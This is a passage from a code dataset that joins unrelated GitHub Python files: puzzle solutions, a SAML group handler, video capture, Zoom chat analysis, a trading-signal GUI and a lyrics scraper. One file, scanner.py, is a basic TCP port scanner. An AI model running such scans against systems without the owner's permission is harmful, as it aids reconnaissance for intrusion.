masterThread.join()\n","repo_name":"SpinalHDL/SpinalHDL","sub_path":"tester/src/test/python/spinal/I2CTester2/IoMasterTester/ioMasterTester.py","file_name":"ioMasterTester.py","file_ext":"py","file_size_in_byte":9352,"program_lang":"python","lang":"en","doc_type":"code","stars":1406,"dataset":"github-code","pt":"52"} +{"seq_id":"70250425444","text":"from django.dispatch import receiver\n\nfrom djangosaml2.signals import pre_user_save\n\nfrom django.conf import settings\n\n\nACTIVE_GROUPS = set(getattr(settings, 'SAML_ACTIVE_GROUPS', []))\nSTAFF_GROUPS = set(getattr(settings, 'SAML_STAFF_GROUPS', []))\nSUPERUSER_GROUPS = set(getattr(settings, 'SAML_SUPERUSER_GROUPS', []))\nGROUPS_ATTRIBUTE = getattr(settings, 'SAML_GROUPS_ATTRIBUTE', 'memberOf')\n\n\n@receiver(pre_user_save)\ndef update_group_membership(\n sender, instance, attributes: dict, user_modified: bool, **kwargs) -> bool:\n \"\"\"Update user's group membership based on passed SAML groups\n\n Args:\n sender: The class of the user that just logged in.\n instance: User instance\n attributes: SAML attributes dict.\n user_modified: Bool whether the user has been modified\n kwargs:\n signal: The signal instance\n\n Returns:\n Whether or not the user has been modified. This allows the user\n instance to be saved once at the conclusion of the auth process\n to keep the writes to a minimum.\n \"\"\"\n assertion_groups = set(attributes.get(GROUPS_ATTRIBUTE, []))\n if SUPERUSER_GROUPS.intersection(assertion_groups):\n instance.is_superuser = True\n user_modified = True\n if STAFF_GROUPS.intersection(assertion_groups):\n instance.is_staff = True\n user_modified = True\n if ACTIVE_GROUPS.union(STAFF_GROUPS).union(SUPERUSER_GROUPS).intersection(assertion_groups):\n # All of the groups referenced above should be active.\n instance.is_active = True\n user_modified = True\n return user_modified\n","repo_name":"grahamgilbert/crypt-server-saml","sub_path":"signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"52"} +{"seq_id":"40895229409","text":"from typing import Dict, Tuple\n# import time\n# start_time = time.time()\n\nwith open('input.txt', 'r') as file:\n path1, path2 = file.read().split('\\n')\n\ndr = {'U': 1, 'D': -1, 'L': 0, 'R': 0}\ndc = {'R': 1, 'L': -1, 'U': 0, 'D': 0}\n\nvisited: Dict[Tuple[int,int], int]\nvisited = {} # maps coordinates to steps taken to get there\n\nr = c = length = 0\n\nfor command in path1.split(','):\n op = command[0] # def not copying leo\n steps = int(command[1:])\n\n for step in range(steps):\n r += dr[op]\n c += dc[op]\n length += 1\n visited[(r,c)] = length\n\nmin_distance = float('inf')\nr = c = length = 0\n\nfor command in path2.split(','):\n op = command[0]\n steps = int(command[1:])\n\n for step in range(steps):\n r += dr[op]\n c += dc[op]\n length += 1\n\n if (r,c) in visited:\n min_distance = min(min_distance, length + visited[(r,c)])\n print(min_distance)\n\n# print(\"--- %.6f seconds ---\" % (time.time() - start_time))\n\n# > time python3 day03.py \n# 0.220s","repo_name":"jsondoo/AdventOfCode","sub_path":"2019/day03/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23132043055","text":"from Library import *\r\nfrom guideline import *\r\n\r\n##############어깨##############\r\n#어깨 가이드라인 겹치기\r\ndef Media_Shoulder():\r\n count = 0\r\n saveon = False\r\n Start_Time = time.time()\r\n\r\n with mp_pose.Pose(min_detection_confidence=0.5, min_tracking_confidence=0.5) as pose:\r\n while cv2.waitKey(1) < 0:\r\n frames = PIPELINE.wait_for_frames()\r\n depth_frames = ALIGN.process(frames)\r\n frame = frames.get_color_frame()\r\n depth = depth_frames.get_depth_frame()\r\n\r\n if not frame or not depth:\r\n continue\r\n\r\n frame = cv2.cvtColor(np.asanyarray(frame.get_data()), cv2.COLOR_BGR2RGB)\r\n\r\n MP_landmark = pose.process(frame)\r\n if 0 <= int(L_SHOULDER.x) < WIDTH and 0 <= int(L_SHOULDER.y) < HEIGHT:\r\n if 0 <= int(R_SHOULDER.x) < WIDTH and 0 <= int(R_SHOULDER.y) < HEIGHT:\r\n L_SHOULDER.z = depth.get_distance(int(L_SHOULDER.x), int(L_SHOULDER.y))\r\n R_SHOULDER.z = depth.get_distance(int(R_SHOULDER.x), int(R_SHOULDER.y))\r\n MIDDLE_LR_S.z = (L_SHOULDER.z + R_SHOULDER.z) / 2\r\n\r\n # #가이드라인 확인 5초마다\r\n if time.time() - Start_Time > N_SECONDS:\r\n count += 1\r\n Start_Time = time.time()\r\n\r\n if INguideline(depth, MP_landmark):\r\n saveon = save()\r\n\r\n #*미디어 파이프 그리기\r\n mp_drawing.draw_landmarks(\r\n frame,\r\n MP_landmark.pose_landmarks,\r\n mp_pose.POSE_CONNECTIONS,\r\n landmark_drawing_spec=mp_drawing_styles.get_default_pose_landmarks_style()\r\n )\r\n \r\n #가이드 라인 추가 및 텍스트 설정\r\n frame = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)\r\n frame = cv2.flip(frame,1)\r\n frame = cv2.bitwise_and(frame,GUIDELINE)\r\n frame = GuideText(frame)\r\n \r\n #화면 표시\r\n cv2.imshow(\"\", frame)\r\n\r\n # 종료 조건\r\n if cv2.waitKey(5) & 0xFF == 27:\r\n break\r\n \r\n # 타임 아웃\r\n if count > COUNTOUT:\r\n break\r\n \r\n if saveon:\r\n #저장완료\r\n break\r\n\r\n\r\n############## SAVE MEDIA #################\r\n\r\n#어깨 영상 저장\r\ndef save():\r\n VIDEO_COLOR_WRITER = cv2.VideoWriter(ROOT_DIR + '/image/color_output.mp4', cv2.VideoWriter_fourcc(*'mp4v'), 10, (WIDTH, HEIGHT), isColor = True)\r\n #VIDEO_DEPTH_WRITER = cv2.VideoWriter('C:/lab/Demo/image/depth_output.mp4', cv2.VideoWriter_fourcc(*'mp4v'), 10, (WIDTH, HEIGHT), isColor = True)\r\n #* 촬영 시작\r\n STR.guide = '촬영을 시작합니다 3'\r\n \r\n stime = cv2.getTickCount() # 시작 시간 기록\r\n # RGB 프레임을 받아옴\r\n with mp_pose.Pose(min_detection_confidence=0.5,min_tracking_confidence=0.5) as pose:\r\n while cv2.waitKey(1) < 0:\r\n\r\n frames = PIPELINE.wait_for_frames()\r\n depth_frames = ALIGN.process(frames)\r\n color_frame = frames.get_color_frame()\r\n depth_frame = depth_frames.get_depth_frame()\r\n \r\n if not color_frame: continue\r\n \r\n # RGB 프레임을 이미지로 변환\r\n color_image = np.asanyarray(color_frame.get_data())\r\n depth_iamge = np.asanyarray(depth_frame.get_data())\r\n \r\n #가이드 라인 체크\r\n frame = cv2.cvtColor(color_image, cv2.COLOR_BGR2RGB)\r\n results = pose.process(frame)\r\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\r\n frame = cv2.bitwise_and(frame, GUIDELINE)\r\n \r\n if not INguideline(depth_frame, results):\r\n STR.guide = \"가이드라인 안에 들어와주세요\"\r\n return False\r\n \r\n frame = cv2.flip(frame,1)\r\n frame = GuideText(frame)\r\n cv2.imshow(\"\", frame)\r\n\r\n\r\n ctime = cv2.getTickCount() # 현재 시간 기록\r\n etime = (ctime - stime) / cv2.getTickFrequency() # 경과 시간 계산\r\n\r\n\r\n # 5초가 경과하면 녹화 종료\r\n if 1 < etime < 2:\r\n STR.guide = '촬영을 시작합니다 2'\r\n elif 2 < etime < 3:\r\n STR.guide = '촬영을 시작합니다 1'\r\n \r\n # 동영상에 프레임을 추가\r\n elif etime > 3:\r\n STR.guide = \"촬영중입니다. 움직이지마세요.\"\r\n VIDEO_COLOR_WRITER.write(cv2.flip(color_image,1))\r\n if etime > 8:\r\n break\r\n\r\n # 동영상 저장 종료\r\n VIDEO_COLOR_WRITER.release()\r\n\r\n print('동영상 저장 완료')\r\n \r\n return True","repo_name":"watergun0613/Capstone","sub_path":"Demo/shoulder.py","file_name":"shoulder.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71467463204","text":"def precedence(op):\n value = 0\n if op == '+' or op == '-':\n value = 1\n elif op == '*' or op == '/':\n value = 2\n\n return value\n\n\ndef applyOp(a, b, op):\n result = 0\n if op == '+':\n result = a + b\n elif op == '-':\n result = a - b\n elif op == '*':\n result = a * b\n elif op == '/':\n result = a // b\n\n return result\n\n\ndef eval(expression):\n # value stack to store integer values\n values = []\n\n # operator stack to store operators\n ops = []\n\n i = 0\n while i < len(expression):\n if expression[i] == ' ': # current token is white space\n i += 1\n continue\n elif expression[i] == '(': # current token is opening brace, push it to op stack\n ops.append(expression[i])\n elif expression[i].isdigit(): # current token is a number, push it to value stack\n tmp = 0\n while i < len(expression) and expression[i].isdigit(): # current token is multiple digits number\n tmp = (tmp * 10) + int(expression[i])\n i += 1\n\n values.append(tmp)\n elif expression[i] == ')':\n while len(ops) != 0 and ops[-1] != '(':\n val2 = values.pop() # pop second value first\n val1 = values.pop()\n op = ops.pop()\n tmp = applyOp(val1, val2, op)\n values.append(tmp)\n\n ops.pop() # op stack pop opening brace\n else: # current token is operator\n # if top of ops stack has same or greater precedence to current token, pop op from ops stack and calculate\n while len(ops) != 0 and precedence(ops[-1]) >= precedence(expression[i]):\n val2 = values.pop()\n val1 = values.pop()\n op = ops.pop()\n tmp = applyOp(val1, val2, op)\n values.append(tmp)\n # else push current token to ops stack\n ops.append(expression[i])\n\n i += 1\n\n # entire expression has been parsed, final step is to\n # apply remaining ops to remaining values\n print('ops: ', ops)\n print('values: ', values)\n while len(ops) != 0 and len(values) > 1:\n val2 = values.pop()\n val1 = values.pop()\n op = ops.pop()\n tmp = applyOp(val1, val2, op)\n values.append(tmp)\n\n # now values stack only remain one value\n # we need check if first operator is '-'\n while len(ops) != 0:\n op = ops.pop()\n if op == '-':\n values[0] *= -1\n\n print('ops: ', ops)\n print('values: ', values)\n return values[-1]\n\n\nex = \"- (3 + (2 - 1) )\"\nprint(eval(ex))\n","repo_name":"jlpcri/daily-interview-pro","sub_path":"017_Create_a_simple_calculator/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27444543456","text":"'''\r\n\r\nexample by: dlefcoe\r\n\r\ndarren@redhedge.uk\r\ntwitter: @dlefcoe\r\n\r\nthe cuser cannot use pack and grid together.\r\nie. pack & grid are mutually exclusive.\r\n\r\nframe lets both exist together.\r\n\r\n'''\r\n\r\n# imports\r\nimport tkinter as tk\r\nimport os\r\n\r\n# explicit imports\r\nfrom PIL import Image, ImageTk\r\nfrom tkinter import messagebox\r\n\r\n\r\nroot = tk.Tk()\r\nroot.title('RedHedge - multiple window example')\r\nroot.iconbitmap('RH_icon.ico')\r\n\r\ndef open_window():\r\n global my_image\r\n top = tk.Toplevel()\r\n top.title('the second window')\r\n top.iconbitmap('RH_icon.ico')\r\n\r\n tk.Label(top, text='hello world').pack()\r\n tk.Label(root,text='the main one').pack()\r\n\r\n tk.Button(top, text='close window', command=top.destroy).pack()\r\n\r\n\r\n my_image = ImageTk.PhotoImage(Image.open('images/adjusted yld curve 2020-08-12 13_17_53.png'))\r\n tk.Label(top, image=my_image ).pack()\r\n\r\nbutton = tk.Button(root, text='open the second window', command=open_window)\r\nbutton.pack()\r\n\r\n\r\nroot.mainloop()\r\n\r\n\r\n\r\n","repo_name":"dlefcoe/generalTests","sub_path":"new_window.py","file_name":"new_window.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37516145469","text":"students = []\nsecondLow = []\nif __name__ == '__main__':\n for _ in range(int(input())):\n name = input()\n score = float(input())\n students.append([name, score])\n\nstudents = sorted(students, key=lambda x: x[1])\nfirst = students[0][1]\nsecond = first\ni = 0\nwhile first == second:\n i = i + 1\n second = students[i][1]\n\nfor _ in students:\n if second == _[1]:\n secondLow.append(_[0])\n\nsecondLow.sort()\nprint(*secondLow, sep=\"\\n\")\n\n","repo_name":"SupremeSadat/HackerRank","sub_path":"Python Solutions/Basic Data Types/Nested Lists.py","file_name":"Nested Lists.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28010089060","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis code was created as a means of automatically analyzing the saved\r\nZoom chat transcripts for student participation.\r\n\r\nIt measures the number of times a student comments in the chat thread\r\nand the total number characters they type. What you do with this information\r\nis obviously course and grading rubric specific. I plan on using this\r\nat a minimum to take attendence.\r\n\r\nThis code considers all the folders in your Zoom folder and only analyzes\r\nthose that contain our course name, assuming you set up your reoccuring\r\nZoom meeting with a consistent name. See the \"req_string\" variable.\r\n\r\nCreated on Fri Sep 4 08:41:27 2020\r\nGNU GENERAL PUBLIC LICENSE\r\n@author: Christopher V. Kelly, cvkelly@wayne.edu\r\n\"\"\"\r\n# %%\r\n\r\nimport numpy as np\r\nfrom os import listdir, getcwd\r\nimport csv\r\n\r\n# %%\r\n\r\nstudent_names = ['Nora Jones',\r\n 'Jimmy Page',\r\n 'Frederic Chopin',\r\n 'Stevie Ray Vaughan',\r\n 'Neil Young',\r\n 'Mandarin Orange',\r\n 'Carolina Chocolate Drops',\r\n 'Alice Cooper',\r\n 'Eric Clapton'] # must be unique\r\n\r\n# super-folder that contains all Zoom chats saved as .txt files\r\n# in which there is one sub-folder per class time\r\nfold_in = getcwd()\r\n\r\n# a required text string within the sub-folder\r\n# folders that don't have this string will be ignored\r\nreq_string = 'Biological Physics'\r\n\r\n# folder and file name into which the resulting CSV file will be saved\r\nfold_save = fold_in\r\nfile_save = req_string + ' Chat Participation Data.csv'\r\n\r\n# name of .txt file saved by Zoom\r\nfile = 'meeting_saved_chat.txt'\r\n\r\n# %% initialize some parameters\r\nnum_comments = np.zeros((len(student_names),1000))\r\nnum_total_char = np.zeros((len(student_names),1000))\r\nclass_num = -1\r\nclass_date_list = []\r\nt1 = ' From '\r\nt2 = ' : '\r\n\r\n# %% analyze all chat transcripts\r\nfor fold2 in listdir(fold_in): # loop over each subfolder\r\n a = fold2.find(req_string)\r\n if a > -1: # keep only those that are for your class of interest\r\n class_num += 1\r\n class_date_list.append(fold2[:11])\r\n f = open(fold_in+'\\\\'+fold2+'\\\\'+file,'r')\r\n line = '00'\r\n while len(line)>0: # keep going as long as there are new lines in the transcript\r\n line = f.readline()\r\n for snum,stud in enumerate(student_names): # loop over each student\r\n if line.find(t1+stud)>0 or line.find(t1+' '+stud)>0:\r\n num_comments[snum,class_num] += 1\r\n num_char = len(line)-line.find(t2)-2\r\n num_total_char[snum,class_num] += num_char\r\n f.close()\r\n # print(class_date)\r\n\r\nnum_comments = num_comments[:,:class_num+1] # reduce the array size for the appropriate number of classes\r\nnum_total_char = num_total_char[:,:class_num+1] # reduce the array size for the appropriate number of classes\r\n\r\n# %% Have a quick look at the data to ensure it makes sense\r\n# You may want to comment out these lines if you have a large class\r\nprint('num_comments')\r\nprint(num_comments)\r\n\r\nprint('num_total_char')\r\nprint(num_total_char)\r\n\r\n\r\n# %% Write the results in to a CSV file that can be easily viewed and analyzed with Excel\r\nfwrite1 = open(fold_save + '\\\\' + file_save,'w',newline='')\r\nfwrite2 = csv.writer(fwrite1)\r\n\r\n# write the data for the number of chats per student\r\nfwrite2.writerow(['NUMBER OF CHATS']+class_date_list)\r\nfor snum,stud in enumerate(student_names):\r\n fwrite2.writerow([stud]+list(num_comments[snum,:]))\r\nfwrite2.writerow([' ']*(num_comments.shape[1]+1))\r\n\r\n# write the data for the number of characters per student\r\nfwrite2.writerow(['NUMBER OF CHARACTERS']+class_date_list)\r\nfor snum,stud in enumerate(student_names):\r\n fwrite2.writerow([stud]+list(num_total_char[snum,:]))\r\n\r\nfwrite1.close()\r\n","repo_name":"CVKellyWSU/Analyze-Zoom-Participation","sub_path":"Analyse_Zoom_Chats.py","file_name":"Analyse_Zoom_Chats.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4855618156","text":"from Domain.Enums.OnlineColumns import onlineColumns\nfrom Domain.Enums.TableType import tableType\nfrom Infrastructure.Repository.OfflineDataRepository import offlineData_repo\nfrom Infrastructure.Repository.OnlineDataRepository import onlineData_repo\nfrom Application.Services.ReadData.ReadOffline.ReadOfflineServices import read_offline_services\nfrom Application.Services.ReadData.ReadOnline.OnlineDataHandler import onlineDataHandler\nfrom Application.Utility.TimeUtility import *\nfrom Infrastructure.Repository.TickerRepository import ticker_repo\nfrom Application.Services.DataProcess import get_data_from_web\nfrom datetime import datetime\nimport winsound\nfrom tkinter import *\nfrom tkinter import ttk\n\n# Create an instance of tkinter frame\nwin = Tk()\n\n# Set the size of the tkinter window\nwin.geometry(\"1700x1350\")\ns = ttk.Style()\ns.theme_use('clam')\ns.configure(\"Treeview\",\n\tbackground=\"#D3D3D3\",\n\tforeground=\"black\",\n\trowheight=25,\n\tfieldbackground=\"#D3D3D3\")\n\n# Add a Treeview widget\ntree = ttk.Treeview(win, column=(\"c1\", \"c2\", \"c3\", \"c4\", \"c5\", \"c6\", \"c7\"), show='headings', height=100)\ntree.column(\"# 1\", anchor=CENTER)\ntree.column(\"# 2\", anchor=CENTER)\ntree.column(\"# 3\", anchor=CENTER)\ntree.column(\"# 4\", anchor=CENTER)\ntree.column(\"# 5\", anchor=CENTER)\ntree.column(\"# 6\", anchor=CENTER)\ntree.column(\"# 7\", anchor=CENTER)\ntree.heading(\"# 1\", text=\"Signal Type\")\ntree.heading(\"# 2\", text=\"Ticker\")\ntree.heading(\"# 3\", text=\"Buy Percapita\")\ntree.heading(\"# 4\", text=\"Sell Percapita\")\ntree.heading(\"# 5\", text=\"Real Power\")\ntree.heading(\"# 6\", text=\"Price Change\")\ntree.heading(\"# 7\", text=\"Volume Ratio\")\n\nIDs = ticker_repo().read_list_of_tickers(tickerTypes= [1])[\"ID\"]\n\ncache = onlineDataHandler(IDs)\n\ndef action():\n\n winsound.Beep(500, 200)\n tree.delete(*tree.get_children())\n\n while True:\n try:\n (onlineDataList, cacheDataDict) = get_data_from_web()\n break\n except:\n continue\n\n if cacheDataDict == None:\n print('None')\n\n else:\n\n cache.update(cacheDataDict)\n\n print(datetime.now())\n\n # run strategy\n lastPrice = cache.lastPrice(num= 10)\n maxAllowedPrice = cache.maxAllowedPrice()\n lastPricePrc5 = cache.lastPricePRC(decNum= 20, num= 2)\n volumeDif = cache.volumeDif(num=1, decNum= 5)\n volume = cache.volume(num=1)\n buyPerCapita = cache.perCapitaBuy(num= 1)\n sellPerCapita = cache.perCapitaSell(num= 1)\n realPower = cache.realPower(num= 1)\n\n availableIDs = list(lastPrice.keys())\n\n signaledData = []\n\n def single_ticker_calc(ID):\n\n priceDif5 = round(lastPricePrc5[ID][-1]-lastPricePrc5[ID][0], 1)\n volumeRatio = round(volumeDif[ID][-1]/volume[ID][-1], 2)\n\n if lastPrice[ID][0] == maxAllowedPrice[ID]:\n\n numberOfBuyQueueTimes = 0\n for price in lastPrice[ID]:\n if price == maxAllowedPrice[ID]:\n numberOfBuyQueueTimes += 1\n\n if numberOfBuyQueueTimes < 5:\n\n signaledData.append(('BQ...', str(ticker_repo().read_by_ID(ID)['FarsiTicker']),\n buyPerCapita[ID][0], sellPerCapita[ID][0], round(realPower[ID][0], 2), priceDif5, volumeRatio))\n\n \n if buyPerCapita[ID][0] > 30 and lastPrice[ID][0] != maxAllowedPrice[ID]:\n signaledData.append(('Good Condition but not BQ', str(ticker_repo().read_by_ID(ID)['FarsiTicker']),\n buyPerCapita[ID][0], sellPerCapita[ID][0], round(realPower[ID][0], 2), priceDif5, volumeRatio))\n\n\n for ID in availableIDs:\n try:\n single_ticker_calc(ID)\n except:\n print('Error')\n\n signaledData.sort(key=lambda tup: tup[2], reverse=True)\n\n for tickerData in signaledData:\n tree.insert('', 'end', text=\"1\", values=tickerData)\n \n win.after(15000, action) \n\ntree.pack()\n\nwin.after(15000, action)\n\nwin.mainloop()","repo_name":"shakouri20/BoursePlus","sub_path":"onlineStrategyBuyQueue.py","file_name":"onlineStrategyBuyQueue.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74837052965","text":"import socket\nimport sys\n\ndef usage(error = 0):\n print(\"Usage: scanner.py -v -p \")\n sys.exit(error)\n\ndef process_arguments():\n verbose = False\n aux_ports = []\n max_number_of_arguments = 5\n min_number_of_arguments = 2\n\n if len( sys.argv ) < min_number_of_arguments or len( sys.argv ) > max_number_of_arguments :\n usage(1)\n\n for pos in range(len(sys.argv)):\n if sys.argv[pos] == \"-h\" or sys.argv[pos] == \"--help\":\n usage(0)\n if sys.argv[pos] == \"-p\" or sys.argv[pos] == \"--ports\":\n if len(sys.argv) < pos + 3 :\n usage(1)\n aux_ports = sys.argv[pos + 1].split(',')\n if sys.argv[pos] == \"-v\":\n verbose = True\n\n ip = sys.argv[-1]\n if not isinstance(ip, str):\n usage(1)\n\n ports = []\n for p in aux_ports:\n\n port = p.split('-')\n if not str.isdigit( port[0] ) :\n usage(1)\n\n if len(port) > 1 and str.isdigit( port[1] ):\n ports.extend( range( int(port[0]), int(port[1]) + 1 ) )\n else:\n ports.append( int(port[0]) )\n\n return ports, ip, verbose\n\ndef scan_port(ip, port, verbose):\n if verbose:\n print(\"Trying to connect to port: \" + str(port))\n\n try:\n s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )\n\n res = s.connect_ex(( ip, port ))\n if res == 0 :\n print(\"Port \" + str(port) + \" is open\")\n s.close()\n\n except socket.gaierror:\n print(\"Can't resolve hostname\")\n sys.exit()\n except OSError:\n print(\"An error ocurred\")\n sys.exit()\n except KeyboardInterrupt:\n print(\"\")\n sys.exit()\n\nports, ip, verbose = process_arguments()\n\n# Default ports to scan\nif not ports:\n ports = [21, 22, 80, 443]\n\nfor p in ports:\n scan_port(ip, p, verbose)\n","repo_name":"joacomi/PortScanner","sub_path":"scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16857808961","text":"import numpy as np\r\nimport cv2\r\nfrom collections import deque\r\n\r\nline = np.ones((210,2,3),dtype = np.uint8)\r\nline = line*255\r\ncv2.imwrite(\"data\\images\\line.jpg\",line)\r\nline = cv2.imread(\"data\\images\\line.jpg\")\r\n\r\nclass Env:\r\n def __init__(self,env):\r\n self.env = env\r\n self.observation_space = self.env.observation_space\r\n self.action_space = self.env.action_space\r\n self.buffer = deque(maxlen=4)\r\n self.randomness()\r\n\r\n def randomness(self):\r\n for i in range(4):\r\n self.buffer.append(self.env.reset()[0])\r\n\r\n def reset(self):\r\n reset = self.env.reset()\r\n self.buffer.append(reset[0])\r\n image1 = cv2.hconcat([self.buffer[-4],line,self.buffer[-3]])\r\n image2 = cv2.hconcat([self.buffer[-2],line,self.buffer[-1]])\r\n image = cv2.vconcat([image1,image2])\r\n save = cv2.imwrite(\"data\\images\\concat-image.jpg\",image)\r\n return image\r\n \r\n def render(self):\r\n self.env.render()\r\n\r\n def close(self):\r\n self.env.close()\r\n\r\n def next_state(self,new_state):\r\n self.buffer.append(new_state)\r\n image1 = cv2.hconcat([self.buffer[-4],line,self.buffer[-3]])\r\n image2 = cv2.hconcat([self.buffer[-2],line,self.buffer[-1]])\r\n image = cv2.vconcat([image1,image2])\r\n save = cv2.imwrite(\"data\\images\\concat-next-image.jpg\",image)\r\n return image\r\n \r\n def step(self,action):\r\n next_state,reward,done,info,_ = self.env.step(action)\r\n next_state = self.next_state(next_state)\r\n return next_state,reward,done,info","repo_name":"SVISHNUVARDHAN3610/SOFT-ACTOR-CRITIC","sub_path":"Env.py","file_name":"Env.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19835593227","text":"import os\n\nfrom aiohttp import ClientSession\nfrom bs4 import BeautifulSoup\nfrom googlesearch import search\n\nfrom userge import userge, Message, pool\n\n\n@userge.on_cmd(\"glyrics\", about={\n 'header': \"Genius Lyrics\",\n 'description': \"Scrape Song Lyrics from Genius.com\",\n 'usage': \"{tr}glyrics [Song Name]\",\n 'examples': \"{tr}glyrics Swalla Nicki Minaj\"})\nasync def glyrics(message: Message):\n song = message.input_str\n if not song:\n await message.edit(\"Bruh WTF?\")\n return\n await message.edit(f\"__Searching Lyrics For {song}__\")\n to_search = song + \"genius lyrics\"\n gen_surl = list(search(to_search, num=1, stop=1))[0]\n async with ClientSession() as ses, ses.get(gen_surl) as res:\n gen_page = await res.text()\n scp = BeautifulSoup(gen_page, 'html.parser')\n lyrics = await get_lyrics(scp)\n if not lyrics:\n await message.edit(f\"No Results Found for: `{song}`\")\n return\n lyrics = os.linesep.join(lyrics.splitlines())\n title = scp.find('title').get_text().split(\"|\")\n writers = await get_writers(scp) or \"UNKNOWN\"\n lyr_format = ''\n lyr_format += '**' + title[0] + '**\\n\\n'\n lyr_format += '__' + lyrics + '__'\n lyr_format += \"\\n\\n**Written By: **\" + '__' + writers + '__'\n lyr_format += \"\\n**Source: **\" + '`' + title[1] + '`'\n\n if lyr_format:\n await message.edit(lyr_format)\n else:\n await message.edit(f\"No Lyrics Found for **{song}**\")\n\n\n# Added seperate scraping functions to change logic easily in future...\n@pool.run_in_thread\ndef get_lyrics(bs):\n lyrics = bs.find_all(\n \"div\",\n class_=lambda __class: __class and __class.startswith(\"Lyrics__Container\"),\n )\n if not lyrics:\n return None\n for lyric in lyrics:\n for br in lyric.find_all(\"br\"):\n br.replace_with(\"\\n\")\n return \"\\n\".join([x.text for x in lyrics])\n\n\n@pool.run_in_thread\ndef get_writers(bs):\n writers = bs.find(\"div\", class_=\"fognin\")\n if writers.contents[0].extract().text == \"Written By\":\n return writers.text\n return None\n","repo_name":"UsergeTeam/Userge-Plugins","sub_path":"plugins/utils/lyrics/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"52"} +{"seq_id":"26163170030","text":"num = 1024\nprint(hex(num))\n\nnum = 5.23222\nprint(round(num, 2))\n\ns = 'hello how are you Mary, are you feeling okay?'\nprint(s.lower())\n\ns = 'twywywtwywbwhsjhwuwshshwuwwwjdjdid'\nprint(s.count('w'))\n\n\nset1 = {2,3,1,5,6,8}\nset2 = {3,1,7,5,6,8}\n# Find the elements in set1 that are not in set2\nres = set1.intersection(set2)\nprint(res)\n\nres = {x: x**3 for x in range(5)}\nprint(res)\n\nlist1 = [1,2,3,4]\nlist1.reverse()\nprint(list1)\n\n\nlist2 = [3,4,2,5,1]\nlist2.sort()\nprint(list2)","repo_name":"DTL625/udemy-course-code","sub_path":"Complete-Python-Bootcamp/Advance/AdvanceTest.py","file_name":"AdvanceTest.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35137488754","text":"#Setup logging\nimport logging\nlog = logging.getLogger(__name__)\n\n#Python Modules\nfrom datetime import datetime\n\n#Local Modules\nfrom ..alarm import Alarm\nfrom ..utils import *\n\n#Exernal Modules\nimport facebook\n\nclass FacebookPages_Alarm(Alarm):\n\n\t_defaults = {\n\t\t'pokemon':{\n\t\t\t'message': \"A wild has appeared! Available until <24h_time> ().\",\n\t\t\t'link': \"\"\n\t\t},\n\t\t'pokestop':{\n\t\t\t'message': \"Someone has placed a lure on a Pokestop! Lure will expire at <24h_time> ().\",\n\t\t\t'link': \"\"\n\t\t},\n\t\t'gym':{\n\t\t\t'message':\"A Team gym has fallen! It is now controlled by .\",\n\t\t\t'link': \"\"\n\t\t}\n\t}\n\n\t#Gather settings and create alarm\n\tdef __init__(self, settings):\n\t\t#Service Info\n\t\tself.page_access_token = settings['page_access_token']\n\t\tself.startup_message = settings.get('startup_message', \"True\")\n\t\tself.startup_list = settings.get('startup_list', \"True\")\n\t\t\t\t\n\t\t#Set Alerts\n\t\tself.pokemon = self.set_alert(settings.get('pokemon', {}), self._defaults['pokemon'])\n\t\tself.pokestop = self.set_alert(settings.get('pokestop', {}), self._defaults['pokestop'])\n\t\tself.gym = self.set_alert(settings.get('gyms', {}), self._defaults['gym'])\n\t\t\n\t\t#Connect and send startup messages\n\t\tself.connect()\n\t\ttimestamps = get_timestamps(datetime.utcnow());\n\t\tif parse_boolean(self.startup_message):\n\t\t\tself.client.put_wall_post(message=\"%s - PokeAlarm has intialized!\" % timestamps[2])\n\t\tlog.info(\"FacebookPages Alarm intialized.\")\n\t\t\n\t#Establish connection with FacebookPages\n\tdef connect(self):\n\t\tself.client = facebook.GraphAPI(self.page_access_token)\n\t\t\t\n\t#Set the appropriate settings for each alert\n\tdef set_alert(self, settings, default):\n\t\talert = {}\n\t\talert['message'] = settings.get('message', default['message'])\n\t\talert['link'] = settings.get('link', default['link'])\n\t\t\t\n\t\treturn alert\n\t\n\t#Post Pokemon Message\n\tdef send_alert(self, alert, info):\n\t\targs = {\n\t\t\t\"message\": replace(alert['message'], info),\n\t\t\t\"attachment\": { \"link\": replace(alert['link'], info) }\n\t\t}\n\t\t\n\t\ttry_sending(log, self.connect, \"FacebookPages\", self.client.put_wall_post, args)\n\t\t\n\t#Trigger an alert based on Pokemon info\n\tdef pokemon_alert(self, pokemon_info):\n\t\tself.send_alert(self.pokemon, pokemon_info)\n\t\n\t#Trigger an alert based on Pokestop info\n\tdef 